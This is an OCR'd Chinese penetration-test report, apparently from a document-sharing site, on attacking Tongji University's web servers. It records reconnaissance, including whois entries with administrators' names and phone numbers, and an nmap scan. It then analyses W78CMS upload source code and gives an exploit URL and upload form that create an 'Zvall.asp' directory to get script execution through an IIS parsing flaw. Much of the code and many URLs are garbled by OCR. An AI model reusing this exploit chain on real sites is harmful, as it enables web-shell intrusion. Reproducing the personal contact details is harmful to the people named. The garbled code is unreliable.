《同济大学渗透测试报告讲解》由会员分享,可在线阅读,更多相关《同济大学渗透测试报告讲解(28页珍藏版)》请在金锄头文库上搜索。
1、同济大学渗透测试报告评估人:Zvall目标:同济大学域名: 1信息收集收集网站子站信息为后续渗透做好铺垫1.1 获取 IP: 使用 Ping 得到 IP 202.120.189.3 address:上海Ping 返回 Request timed out 不 排除有防火墙WAF等包过滤的可能1.2 Whois查询得到:网段:202.120.176.0 - 202.120.191.255管理员联系:Cui , Zijun (ZC3-CN) +86-21-6598-9006 技术人员联系:Wang , Zhengping (ZW2-CN)+86 21 65025080 ext. 2840最后更新记录
2、在19970627 记录于 202.120.191.30 202.120.191.208Mail:收集 222.66.109.6Mail 服务器:http:/ 米用是的:网易 Coremail Java 写的 用xml的格式进行数据传递利用xml解析漏洞可能读取任意文件邮箱收集:碰过很多用邮箱前辍做密码的 092783tongji.edu子域:分布这个网段:202.120.189.3-202.120.189.255C段全部是WEB应用同服网站:http:/ http:/ http:/ http:/2.IP扫描nmap -sS -sV -P0 -T4 -O -A -
3、F -sC -version-light -v 80/tcp open http nginx 1.0.8I_http-methods: No Allow or Public header in OPTIONS response (status code 405) l_http-title: xE6xACxA2xE8xBFx8ExE8xAExBFxE9x97xAExE5x90x8CxE6x B5x8ExE5xA4xA7xE5xADxA6xE4xB8xBBxE9xAlxB5nix只对外开放一个80估计是Iptables策略信息收集的差不多这后由于主站只开放一个WEB应用只好转战WEB上来:1.3
4、 Web服务评估:1. 查找指纹提交一个HEAD返回:Request sent. 238 bytes HTTP/1.1 200 OK Server: nginx/1.0.8 Date: Fri, 10 Aug 2012 09:53:41 GMT Content-Type: text/html Connection: keep-alive Vary: Accept-Encoding jp:37 - www. tong j i . edu. cn/f aculty/iriages/l_68 jpg* 1 112-93-10 18:4937 URL:http:/www.tongji.edujcn/f
5、aculty/images/l-?-jp: i.41 - jpg* 1 112-93-10 18 :4937 URL:http:/www.tongji.芒du:cn/f aculty/images/l_?8 jp: - www. tong j i . edu. cn/f aculty/inages/l_?8 jpg* 1 112-93-10 18:4937 URL:http:/www.tongji.edujcn/faculty/images/l-Sajp:用findstr找并没有找到HIDDEN字段在SC目录下找到一个asp的网站 测试了也没存在漏洞 还调用了防注入程序过滤GET POST
6、COOKIE提交过来的数据 主站无果 旁站也没有可拿到shell的漏洞 现在只好渗透分站了Ip:202.120.189.3此站服务器上只有一个站点初步估计权限会很大好提权好吧就它了 先测试注入提交单引号:http:/ Q冈園;岭恢厂收藏邀3止鱼)f eelgoogle. com/您指定的屈页无法访间!错误类型:连接失败提示:爆露了所用WEB程序为:W78cms如果直接跳转不用Response.End结束程序的话我们仍可以注入W78CMS存在一个上传漏洞:分析下源码:Sub InitUpload()sType = UCase(Trim(Request.QueryString(type)sStyl
7、eName = Trim(Request.QueryString(style)sCusDir = Trim(Request.QueryString(cusdir)sParamSYFlag = Trim(Request.QueryString(syflag)sCusDir = Replace(sCusDir, , /)If Left(sCusDir, 1) = / Or Left(sCusDir, 1) = . Or Right(sCusDir, 1) = . Or InStr(sCusDir, ./) 0 Or InStr(sCusDir, /.) 0 Or InStr(sCusDir, /)
8、 0 ThensCusDir =这里程序员只考虑到了跨目录的问题End IfDim i, aStyleConfig, bValidStylebValidStyle = FalseFor i = 1 To Ubound(aStyle)aStyleConfig = Split(aStyle(i), III)If Lcase(sStyleName) = Lcase(aStyleConfig(O) ThenbValidStyle = TrueExit ForEnd IfNextIf bValidStyle = False ThenOutScript(parent.UploadError(style)E
9、nd IfsBaseUrl = aStyleConfig(19)nUploadObject = Clng(aStyleConfig(20)nAutoDir = CLng(aStyleConfig(21)sUploadDir = aStyleConfig(3)If sBaseUrlv3 ThenIf Left(sUploadDir, 1) / ThensUploadDir =./ & sUploadDirEnd IfEnd IfSelect Case sBaseUrlCase 0, 3sContentPath = aStyleConfig(23)Case 1sContentPath = Rela
10、tivePath2RootPath(sUploadDir)Case 2sContentPath = RootPath2DomainPath(RelativePath2RootPath(sUploadDir)End SelectIf sBaseUrlv3 ThensUploadDir = Server.Mappath(sUploadDir)这里创建目录End IfIf Right(sUploadDir,l)v ThensUploadDir = sUploadDir & End If很明显 程序员只考虑到跨目录的漏洞没有过滤点号最后创目录结合IIS解析漏洞 导致漏 洞形成 漏洞修复方法:sCusD
11、ir = Replace(sCusDir, .,)漏洞利用:http:/ style=popup&cusdir=Zvall.asp这时程序会在uploadfile目下创建一个名为Zvall.asp的文件夹vformaction=http:/ =image&style=popup&cusdir=Zvall.asp method=post name=myform enctype=multipart/form-datavbrvbr扔件编劉E)格式查看帮肋clwww/upl(jadFilp/1_asp/2B1208/2O12081U172949606_giF;htmleWebEditormeta http-equiu= Cfjnteni :ha AUFhE日dAUtJotiyAUs匚广ip
